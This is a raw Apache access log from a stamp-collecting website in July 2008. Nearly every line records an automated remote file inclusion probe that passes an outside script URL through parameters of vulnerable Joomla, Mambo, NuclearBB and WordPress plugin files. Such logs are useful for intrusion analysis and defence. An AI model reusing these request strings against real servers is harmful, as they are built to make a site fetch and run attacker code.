201.17.3.26 - - [27/Jul/2008:17:00:21 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.17.3.26 - - [27/Jul/2008:17:00:22 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.17.3.26 - - [27/Jul/2008:17:00:24 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.17.3.26 - - [27/Jul/2008:17:00:25 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:01:11 -0700] "GET /logs/access_080331.log//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:01:12 -0700] "GET /logs/access_080331.log//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:01:12 -0700] "GET //ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:01:12 -0700] "GET //ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:01:13 -0700] "GET //ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:01:14 -0700] "GET //ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:01:17 -0700] "GET /logs/access_080331.log//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:01:17 -0700] "GET //ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:01:17 -0700] "GET /logs//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:01:19 -0700] "GET /logs/access_080331.log//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:01:19 -0700] "GET //ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:01:20 -0700] "GET /logs//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:01:36 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:01:36 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:01:37 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:02:02 -0700] "GET /logs/access_080317.log//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:02:15 -0700] "GET /logs/access_080317.log//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:02:31 -0700] "GET /logs/access_080317.log//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:02:51 -0700] "GET /logs/access_080317.log//ipblock.inc.php?path_escape=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:17:03:17 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [27/Jul/2008:17:03:32 -0700] "GET /logs/access_080512.log/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [27/Jul/2008:17:03:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.158.65 - - [27/Jul/2008:17:04:38 -0700] "GET /logs/access_080526.log/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:07:05 -0700] "GET /logs/access_080602.log//admin/classes/TplLoad.php?full_path_to_public_program=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:07:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:17:07:18 -0700] "GET /logs/access_080602.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:17:07:18 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:17:07:19 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:17:07:49 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:17:07:51 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:17:07:54 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:08:44 -0700] "GET /logs/access_080616.log//admin/classes/TplLoad.php?full_path_to_public_program=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:17:08:52 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:09:26 -0700] "GET /logs/access_080616.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:09:32 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:17:11:20 -0700] "GET /logs//include/write.php?dir=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:17:11:25 -0700] "GET //include/write.php?dir=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:17:11:25 -0700] "GET /logs/access_080630.log//include/write.php?dir=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:17:11:31 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:11:41 -0700] "GET /logs/access_080428.log//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:11:41 -0700] "GET //ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:11:42 -0700] "GET /logs/access_080428.log//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:11:42 -0700] "GET //ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:11:50 -0700] "GET /logs/access_080428.log//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:11:51 -0700] "GET //ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:11:51 -0700] "GET /logs//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.243.169.10 - - [27/Jul/2008:17:11:52 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://h1.ripway.com/anakbugis/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.243.169.10 - - [27/Jul/2008:17:11:52 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://h1.ripway.com/anakbugis/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:11:52 -0700] "GET /logs/access_080428.log//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.243.169.10 - - [27/Jul/2008:17:11:52 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://h1.ripway.com/anakbugis/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:11:53 -0700] "GET //ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:11:53 -0700] "GET /logs//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:12:39 -0700] "GET /logs/access_080609.log//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:12:44 -0700] "GET /logs/access_080609.log//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:13:12 -0700] "GET /logs/access_080609.log//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:17:13:24 -0700] "GET /logs/access_080310.log%20//include/write.php?dir=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:13:29 -0700] "GET //ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:13:30 -0700] "GET /logs/access_080609.log//ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:13:49 -0700] "GET //ask_password.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.243.169.10 - - [27/Jul/2008:17:14:22 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://h1.ripway.com/anakbugis/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:14:28 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:14:28 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:14:29 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:14:51 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:14:52 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:14:52 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:17:16:38 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:17:16:39 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:17:16:41 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
201.17.3.26 - - [27/Jul/2008:17:16:55 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:16:55 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:16:56 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:16:56 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:16:58 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:16:58 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:17:16:59 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.18.151.242 - - [27/Jul/2008:17:18:59 -0700] "GET /logs/access_080602.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
67.18.151.242 - - [27/Jul/2008:17:18:59 -0700] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
67.18.151.242 - - [27/Jul/2008:17:18:59 -0700] "GET /logs/access_080609.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:19:19 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.18.151.242 - - [27/Jul/2008:17:19:56 -0700] "GET /logs/access_080602.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.18.151.242 - - [27/Jul/2008:17:19:56 -0700] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.18.151.242 - - [27/Jul/2008:17:19:56 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.18.151.242 - - [27/Jul/2008:17:19:57 -0700] "GET /logs/access_080609.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:17:20:36 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:20:49 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:20:55 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:17:21:37 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:17:21:38 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:17:21:40 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
80.78.83.42 - - [27/Jul/2008:17:25:29 -0700] "GET /logs/access_080505.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.78.83.42 - - [27/Jul/2008:17:25:29 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.78.83.42 - - [27/Jul/2008:17:25:30 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.78.83.42 - - [27/Jul/2008:17:25:30 -0700] "GET /logs/access_080428.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:17:25:57 -0700] "GET /logs/access_080630.log/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:17:25:57 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:17:25:58 -0700] "GET /logs/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:17:30:30 -0700] "GET /logs/access_080602.log/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:17:32:36 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.198.180.10 - - [27/Jul/2008:17:32:50 -0700] "GET /logs/access_080630.log/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.198.180.10 - - [27/Jul/2008:17:32:51 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.198.180.10 - - [27/Jul/2008:17:32:51 -0700] "GET /logs/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.90.47.14 - - [27/Jul/2008:17:34:37 -0700] "GET /errors.php?error=http://geocities.com/q.dhie/scan/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.mathstamps.com"
69.90.47.14 - - [27/Jul/2008:17:34:37 -0700] "GET /logs/errors.php?error=http://geocities.com/q.dhie/scan/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.mathstamps.com"
72.9.145.107 - - [27/Jul/2008:17:36:05 -0700] "GET //?page=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
72.9.145.107 - - [27/Jul/2008:17:36:06 -0700] "GET /logs//?page=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 200 8808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.mathstamps.com"
81.198.180.10 - - [27/Jul/2008:17:36:33 -0700] "GET /logs/access_080602.log/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:41:19 -0700] "GET /logs/access_080428.log//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:41:19 -0700] "GET //ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:41:19 -0700] "GET /logs//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:41:19 -0700] "GET /logs/access_080609.log//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:41:49 -0700] "GET /logs/access_080428.log//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
